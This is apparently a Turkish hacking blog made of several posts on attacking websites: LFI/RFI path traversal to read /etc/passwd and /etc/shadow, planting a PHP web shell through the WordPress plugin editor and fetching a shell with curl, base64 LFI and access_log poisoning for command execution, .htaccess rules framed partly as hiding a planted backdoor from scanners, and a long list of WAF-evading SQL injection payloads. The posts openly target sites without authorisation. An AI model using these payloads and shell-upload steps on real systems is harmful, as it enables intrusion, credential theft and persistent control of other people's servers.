Newest Post
Arbitrary File Download nedir
Adından da anlaşılacağı gibi, sistem yöneticileri sistemde gereken önlemleri
Almazlarsa kötü niyetli herhangi bir kullanıcı sunucudan hassas dosyaları indirmek İçin bu güvenlik açığından yararlanabilir. Birçok web uygulamasında, kullanıcının istediği bir veya daha fazla dosyayı indirebileceği dosya indirme bölümleri vardır.
Örnek verecek olursak
Download_file (‘/var/www/store_file/’ + params[:filename])
Bu yöntem kullanıcının girişini alır ve değeri filename parametresine atar. Kullanıcı indirmek için dosyaya tıkladığında, filename' parametresini, indirilen dosyaları depolamak için kullanılan
/var/www/store_file/ dizinine ulaşır
Örneğin, Kullanıcı 'kartal.php' istediğinde,
yol '/var/www/store_file/kartal.php' olacaktır. Tabi dizide mevcutsa, değilse kullanıcı 'Dosya Bulunamadı' mesajı alır.
LFI / RFI
LFI / RFI, Dosya İndirme güvenlik açığından farklıdır. Ancak, sunucuda dizin geçişi açıksa, ikisi
birlikte kullanılır
LFI ve RFI, Yerel Dosya Ekleme ve Uzaktan Dosya Ekleme güvenlik açığı anlamına gelir. Her ikisi
de sömürü biçimi dışında benzer niteliktedir. Her ikisi de, çoğunlukla PHP olan web uygulamaları
tarafından kullanılan filtrelenmemiş giriş dosyası parametrelerinden yararlanır. LFI, web
uygulamasının barındırıldığı makinede bulunan herhangi bir yerel dosyayı kullanırken, RFI ise
URL'leri kullanarak uzaktan barındırılan kötü amaçlı dosyaları içerir.
PHP include işlevi, bir dosya birkaç defa gerektiğinde kullanışlıdır. Bu nedenle, kodu tekrar tekrar
yazmak yerine, dosyayı include () işlevini kullanarak birçok başka dosyanın içine ekleyebiliriz
[CODE]color.php:
<?php
$color= ‘Red’;
$brand= ‘BMW’;
?>
vehicles.php:
<?php
include ‘color.php’;
echo ” I love $color $brand”; //Prints I love Red BMW
?>[/CODE]
http://örnek.com/vehicles.php?pref=color.php
burası normal gibi gözüküyor
http://örnek.com/vehicles.php?pref=../../../../etc/passwd bu
bu şekilde lfı kullanırız
sistem hesaplarını ve kullanıcı özelliklerini listeleyen passwd dosyasının içeriğini
yazdıracaktır.
http://örnek .com/vehicles.php?pref=http://a.com/shell.txt bu şekildede rfı
kullanılabilir
Burada, uygulama, kullanıcının belirli bir klasörde
/user/JBOSS/FINDS/download/
dizininde depolanan dosyaları indirmesine izin vermektedir
../../../../etc/passwd deniyoruz
Böylece, yukarıdaki dizini başarıyla atladık ve unix sisteminin passwd dosyasını İndirebildik
Benzer şekilde ../../../../etc/shadow sağlayarak da 'shadow' dosyasını indirebiliriz.
'Shadow' dosyası kullanıcı adını ve karşılık gelen şifreli şifreyi içerir
Ve shadow dosyası indiriliyor.
Makale alıntıdır yabancı bir kaynaktan çevirdim
merhaba arkadaşlar bugün benim bildiğim sizlerin %99 bilmediği bir yol ile wordpress sistemlerde
komut çalıştırmayı anlatacağım konuyu yabancı bir kayaktan çevirdim
bu şekilde yetki olmayan sitelerde belki işinize yarar
şimdi wordpress yönetici panelinden
pluging>editör
izliyoruz
şimdi herhangi bir pluging seçin
url şu şekilde oldu
/wp-admin/plugin-editor.php?file=akismet/index.php
şimdi editleyeceğiz
şimdi size vereceğim kodu yapıştırıyorsunuz
Önemli
<pre><?php system($_GET['x'])?></pre>
şimdi
öreksitecom/wp-content/plugins/akismet/?x=
bu şekilde konsol çalıştırabilirsiniz
burdan shellde yükleyebilirsiniz
genelde nginx serverlerde çalışan bi yöntemdir
örnek
öreksitecom/wp-content/plugins/akismet/?x=dir
yaptığınız gibi size içerdekileri gösterir
gördüğünüz gibi gayet pratik bir yöntem
curl shellyüküsitecom/shell.txt -o kartal.php şeklinde komut çalıştırdığınızda kartal.php isminde
shellyüküsitecom/shell.txt sitesindeki shellin yüklü olduğu bir dosya size verecektir
Tag :// shell upload,
Tag :// wordpress,
Tag :// wordpress hack,
Tag :// wordpress hacking,
Tag :// wordpressShell upload
Merhaba arkadaşlar bugün sizlere
base64 şeklinde lfı göstereceğim arkadaşlar bazı sitelerde lfı vardır ama işte normal komutlarla onları göremessiniz örnek
asite/page=/etc/passwd şeklinde göremessinizde asite/page=L2V0Yy9wYXNzd2Q= şeklinde yani base64lenmiş şeklinde denerseniz görürsünüz
şimdi hedef sistem bulduk lfı denemesi yapacağız
gördüğünüz gibi sitede işe yaramadı sade /etc/passwd
peki ne yapacağız hemen hackbarda /etc/passwd base64 çevireceğiz
evet çevirdik L2V0Yy9wYXNzd2Q= şimdi bunu deneyeceğiz
gördüğünüz gibi okuduk arkadaşlar şimdi /proc/self/environ bakalım
shell yüklemek için
şimdi base64 çeviriyoruz
gördüğünüz gibi okuduk
şimdi burp ile user agent kısmına payloadımızı yapıştırıyoruz
payload için tıkla
şimdi forward yapıyoruz payloadı yüklüyoruz şimdi
https://s7.dosya.tc/server14/qmx5ig/payload.txt.html
gördüğünüz gibi payload kartal.php base64 çevirdik şimdi shell yükleyelim
gördüğünüz gibi shell yükledik gördüğünüz gibi arkadaşlar sheldeki işlemlerde hata alırsanız base64 çevirmeniz yeterli
şunuda söylüyeyim arkadaşlar belki bu metotlarla çok ilgilenmiyorsunuz
ama şöyle birşey var bu deneme yaptığım sitenin alexa değeri globalde 105 bin Ayyıldız timin global alexsası 132 bin siz düşünün
alexa gördüğünüz gibi
Merhaba arkadaşlar bugün sizlere
siteleri access_log inject ederek lfı siteleri rfı çevirmeyi anlatacağım rfı çevirmekten kastım komut çalıştırmak
sitemizi bulduk arkadaşlar şimdi sitede lfı varmı kontrol ediyoruz
../../../../../../../../../../../../../../../etc/passwd denedik ama olmadı arkadaşlar
şimdi sonuna ekleyerek bypasslıyoruz yani şu şekilde
../../../../../../../../../../../../../../../etc/passwd
şimdi access_logun dizinini bulmak için /etc/httpd/conf/httpd.conf yapıyoruz
ve ctrl+u yapıyoruz ve kendi sitemizi kaynak kodlarında arıyoruz
gördüğünüz gibi 1523 satırda access_log dizini bulduk dizini /home/pro_99/null.com/access_log
1513 satıra bakacak olursak 12.34.5.678:80 (12.34.5.678 temsilidir) server ip ve 80 portunu görüyoruz bu port işimize yarayacak bir kaç adım sonra
şimdi size bi perl script vereceğim onla siteye inject edeceğiz
perl scriptadı.pl hedef.com 80
burdaki 80 daha önce serverde vardı :80 şeklinde buraya serverde açık herangi portu girebilirsiniz
script indir --> http://link.tl/2hVQE
şimdi siteye gidin ve ../../../../../../../../../../../../../../../home/pro_99/null.com/access_log
girin ekranda v0pcr3w arayın eğer ordaysa başarılı olmuş demektir
sitede ../../../../../../../../../../../../../../../home/pro_99/null.com/access_log&cmd= şeklinde artık komut çalıştırabilirsiniz ben id komutuna bakacağım çalışıp çalışmadığını görün diye yukarda gördüğünüz gibi çalışıyor
istediğiniz bir konu veya sorunuz varsa yorum yapın
comment if you have a topic or question you want
merhabalar bugün sizlere websitenizi .htaccess editleyere bazı saldırılardan korunmayı ve sitenizi güvenliği için bir kaç yoldan bahsedeceğim
.htaccess (hypertext access file)
Genelde Sunucunun Ana dizininde olan
Adı olmayan Ayarlar Uygulamalar Yapışan Dosyadır. Güvenlik ,Yetki, Düzenleme, Ayar, kısıtlama vb.
işlemleri yapabiliyoruz.
bu gün Biz Sadece Güvenliğin Bir kısmını Ele Alacağız .
Scannerlardan korunma
örnek bi sitenin içindesiniz çok önemli bir site
siteye backdoor bıraktınız bide shell bunu bulmamaları içinde bunu kullanabilirsiniz
bu alacağımız önlem sayesinde Acunetix,sqlmap,nikto gibi
Scannerlardan korunmamızı sağlıyor bunu yapmak için .htaccess dosyamızın ana dizinde olması lazım .
bunu web scannerlere göre editleyebilirsiniz
RewriteEngine On[/B][/B][/COLOR][/SIZE][/CENTER]
[SIZE=4][COLOR=#000000][B]
[CENTER][B]
<IfModule mod_rewrite.c>
RewriteCond %{HTTP_USER_AGENT} Acunetix [NC,OR]
RewriteCond %{HTTP_USER_AGENT} dirbuster [NC,OR]
RewriteCond %{HTTP_USER_AGENT} jbrofuzz [NC,OR]
RewriteCond %{HTTP_USER_AGENT} webshag [NC,OR]
RewriteCond %{HTTP_USER_AGENT} nikto [NC,OR]
RewriteCond %{HTTP_USER_AGENT} SF [OR]
RewriteCond %{HTTP_USER_AGENT} sqlmap [NC,OR]
RewriteCond %{HTTP_USER_AGENT} fimap [NC,OR]
RewriteCond %{HTTP_USER_AGENT} nessus [NC,OR]
RewriteCond %{HTTP_USER_AGENT} whatweb [NC,OR]
RewriteCond %{HTTP_USER_AGENT} Openvas [NC,OR]
RewriteCond %{HTTP:Acunetix-Product} ^WVS
RewriteRule ^.* http://127.0.0.1/ [R=301,L]
</IfModule>
sql injection Engelleme
günümüzün en popiler açıklarından biri sql injection her sistemde olabilir nerdeyse bütün ülkelerin sitelerinde mevcut bir açık eğer sizin sitenizde sql açığı varsa ve bunun nasıl giderileceğini bilmiyorsanız en azından .htaccess dosyası ile bunu bi nebze önleyebilirsiniz ama şunu söylemekte fayda var buda kesin bir çözüm değil
bunu yapmak için .htaccess dosyamızın ana dizinde olması lazım .
RewriteEngine On[/SIZE][/COLOR][/B][/B][/B][/CENTER]
[B][B][B][COLOR=rgb(0, 0, 0)][SIZE=4]
[CENTER]RewriteCond %{REQUEST_METHOD} ^(HEAD|TRACE|DELETE|TRACK) [NC,OR]
RewriteCond %{HTTP_REFERER} ^(.*)(<|>|’|%0A|%0D|’|<|>|).* [NC,OR]
RewriteCond %{REQUEST_URI} ^/(,|;|<|>|/{2,999}).* [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^(java|curl|wget).* [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^.*(winhttp|HTTrack|clshttp|archiver|loader|email|harvest|extract|grab|miner).* [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^.*(libwww|curl|wget|python|scan).* [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^.*(<|>|’|%0A|%0D|’|<|>|).* [NC,OR]
RewriteCond %{HTTP_COOKIE} ^.*(<|>|’|%0A|%0D|’|<|>|).* [NC,OR]
RewriteCond %{QUERY_STRING} ^.*(localhost|loopback|127\\.0\\.0\\.1).* [NC,OR]
RewriteCond %{QUERY_STRING} ^.*(<|>|’|%0A|%0D|’|<|>|).* [NC,OR]
RewriteCond %{QUERY_STRING} [^a-z](|order|union|declare|char|set|cast|convert|delete|drop|exec|insert|meta|script|select|truncate|update)[^a-z] [NC]
RewriteRule (.*) - [F]
XSS engelleme
xss açığını biliyorsunuzdur bu açığı kesin olarak kapatmak için .htaccess editleyebilirz
şimdi bu ne işe yarayacak saldırgan siteye xss denerse hata ile karşılaşacak
örnek
index.php?id=<script>alert(’Red’)</script>
yaptığımız anda 403 hatası verecektir.
RewriteEngine On[/B][/CENTER][/B][/CENTER]
[B]
[CENTER][B][CENTER]RewriteCond %{QUERY_STRING} base64_encode.*\\(.*\\) [OR]
RewriteCond %{QUERY_STRING} (\\<|<).*script.*(\\>|>) [NC,OR]
RewriteCond %{QUERY_STRING} GLOBALS(=|\\[|\\%[0-9A-Z]{0,2}) [OR]
RewriteCond %{QUERY_STRING} _REQUEST(=|\\[|\\%[0-9A-Z]{0,2})
RewriteRule ^(.*)$ index.php|forum.php|yaz.php [F,L]
websitesi erişim kapatma
örneğin bi websitesiniz var ve siz bu websitesinin a hack forumunda paylaşıldığını
gördünüz sitenizi o siteden gelenlere kapatmak için
<Files ~ "^.(htaccess|htpasswd)$">[/SIZE][/COLOR][/B][/CENTER]
[B][COLOR=rgb(0, 0, 0)][SIZE=5]
[CENTER]deny from all
</Files>
order deny,allow
deny from ahackforumu.com
allow from 192.168.1.1
allow from http://google.com
allow from yazarak izin verip
denny from yazarak engellye biliriz .
ülkelere erişim kapatma
örnek burda IPCountry TR yaparak siteyi TR'den gelenlere kapadık
SetEnvIf CF-IPCountry TR BuzzOff=1[/B][/CENTER]
[B]
[CENTER]Order allow,deny
Allow from all
Deny from env=BuzzOff
Tag :// Htaccess,
Tag :// Htaccess Ile Web Site Güvenliği,
Tag :// Site Güvenliği,
Tag :// Web Site Güvenliği
ORDER BY
/**/ORDER/**/BY/**/
/*!order*/+/*!by*/
/*!ORDER BY*/
/*!50000ORDER BY*/
/*!50000ORDER*//**//*!50000BY*/
/*!12345ORDER*/+/*!BY*/
UNION SELECT
/*!50000%55nIoN*/ /*!50000%53eLeCt*/
%55nion(%53elect 1,2,3)-- -
+union+distinct+select+
+union+distinctROW+select+
/**//*!12345UNION SELECT*//**/
/**//*!50000UNION SELECT*//**/
/**/UNION/**//*!50000SELECT*//**/
/*!50000UniON SeLeCt*/
union /*!50000%53elect*/
+#uNiOn+#sEleCt
+#1q%0AuNiOn all#qa%0A#%0AsEleCt
/*!%55NiOn*/ /*!%53eLEct*/
/*!u%6eion*/ /*!se%6cect*/
+un/**/ion+se/**/lect
uni%0bon+se%0blect
%2f**%2funion%2f**%2fselect
union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
REVERSE(noinu)+REVERSE(tceles)
/*--*/union/*--*/select/*--*/
union (/*!/**/ SeleCT */ 1,2,3)
/*!union*/+/*!select*/
union+/*!select*/
/**/union/**/select/**/
/**/uNIon/**/sEleCt/**/
+%2F**/+Union/*!select*/
/**//*!union*//**//*!select*//**/
/*!uNIOn*/ /*!SelECt*/
+union+distinct+select+
+union+distinctROW+select+
uNiOn aLl sElEcT
UNIunionON+SELselectECT
/**/union/*!50000select*//**/
0%a0union%a0select%09
%0Aunion%0Aselect%0A
%55nion/**/%53elect
uni<on all="" sel="">/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
%252f%252a*/UNION%252f%252a /SELECT%252f%252a*/
%0A%09UNION%0CSELECT%10NULL%
/*!union*//*--*//*!all*//*--*//*!select*/
union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C
/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
+UnIoN/*&a=*/SeLeCT/*&a=*/
union+sel%0bect
+uni*on+sel*ect+
+#1q%0Aunion all#qa%0A#%0Aselect
union(select (1),(2),(3),(4),(5))
UNION(SELECT(column)FROM(table))
%23xyz%0AUnIOn%23xyz%0ASeLecT+
%23xyz%0A%55nIOn%23xyz%0A%53eLecT+
union(select(1),2,3)
union (select 1111,2222,3333)
uNioN (/*!/**/ SeleCT */ 11)
union (select 1111,2222,3333)
+#1q%0AuNiOn all#qa%0A#%0AsEleCt
/**//*U*//*n*//*I*//*o*//*N*//*S*//*e*//*L*//*e*//*c*//*T*/
%0A/**//*!50000%55nIOn*//*yoyu*/all/**/%0A/*!%53eLEct*/%0A/*nnaa*/
+%23sexsexsex%0AUnIOn%23sexsexs ex%0ASeLecT+
+union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C
/*!f****U%0d%0aunion*/+/*!f****U%0d%0aSelEct*/
+%23blobblobblob%0aUnIOn%23blobblobblob%0aSeLe cT+
/*!blobblobblob%0d%0aunion*/+/*!blobblobblob%0d%0aSelEct*/
/union\sselect/g
/union\s+select/i
/*!UnIoN*/SeLeCT
+UnIoN/*&a=*/SeLeCT/*&a=*/
+uni>on+sel>ect+
+(UnIoN)+(SelECT)+
+(UnI)(oN)+(SeL)(EcT)
+’UnI”On’+'SeL”ECT’
+uni on+sel ect+
+/*!UnIoN*/+/*!SeLeCt*/+
/*!u%6eion*/ /*!se%6cect*/
uni%20union%20/*!select*/%20
union%23aa%0Aselect
/**/union/*!50000select*/
/^.*union.*$/ /^.*select.*$/
/*union*/union/*select*/select+
/*uni X on*/union/*sel X ect*/
+un/**/ion+sel/**/ect+
+UnIOn%0d%0aSeleCt%0d%0a
UNION/*&test=1*/SELECT/*&pwn=2*/
un?<ion sel="">+un/**/ion+se/**/lect+
+UNunionION+SEselectLECT+
+uni%0bon+se%0blect+
%252f%252a*/union%252f%252a /select%252f%252a*/
/%2A%2A/union/%2A%2A/select/%2A%2A/
%2f**%2funion%2f**%2fselect%2f**%2f
union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
/*!UnIoN*/SeLecT+
information_schema.tables
/*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/=schEMA()-- -
/*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/ like schEMA()-- -
/*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/=database()-- -
/*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/ like database()-- -
/*!FrOm*/+%69nformation_schema./**/columns+/*!50000Where*/+/*!%54able_name*/=hex table
/*!FrOm*/+information_schema./**/columns+/*!12345Where*/+/*!%54able_name*/ like hex table
Concat
CoNcAt()
concat()
CON%08CAT()
CoNcAt()
%0AcOnCat()
/**//*!12345cOnCat*/
/*!50000cOnCat*/(/*!*/)
unhex(hex(concat(table_name)))
unhex(hex(/*!12345concat*/(table_name)))
unhex(hex(/*!50000concat*/(table_name)))
Group Concat
/*!group_concat*/()
gRoUp_cOnCAt()
group_concat(/*!*/)
group_concat(/*!12345table_name*/)
group_concat(/*!50000table_name*/)
/*!group_concat*/(/*!12345table_name*/)
/*!group_concat*/(/*!50000table_name*/)
/*!12345group_concat*/(/*!12345table_name*/)
/*!50000group_concat*/(/*!50000table_name*/)
/*!GrOuP_ConCaT*/()
/*!12345GroUP_ConCat*/()
/*!50000gRouP_cOnCaT*/()
/*!50000Gr%6fuP_c%6fnCAT*/()
unhex(hex(group_concat(table_name)))
unhex(hex(/*!group_concat*/(/*!table_name*/)))
unhex(hex(/*!12345group_concat*/(table_name)))
unhex(hex(/*!12345group_concat*/(/*!table_name*/)))
unhex(hex(/*!12345group_concat*/(/*!12345table_name*/)))
unhex(hex(/*!50000group_concat*/(table_name)))
unhex(hex(/*!50000group_concat*/(/*!table_name*/)))
unhex(hex(/*!50000group_concat*/(/*!50000table_name*/)))
convert(group_concat(table_name)+using+ascii)
convert(group_concat(/*!table_name*/)+using+ascii)
convert(group_concat(/*!12345table_name*/)+using+ascii)
convert(group_concat(/*!50000table_name*/)+using+ascii)
CONVERT(group_concat(table_name)+USING+latin1)
CONVERT(group_concat(table_name)+USING+latin2)
CONVERT(group_concat(table_name)+USING+latin3)
CONVERT(group_concat(table_name)+USING+latin4)
CONVERT(group_concat(table_name)+USING+latin5)
istediğiniz bir konu veya sorunuz varsa yorum yapın
comment if you have a topic or question you want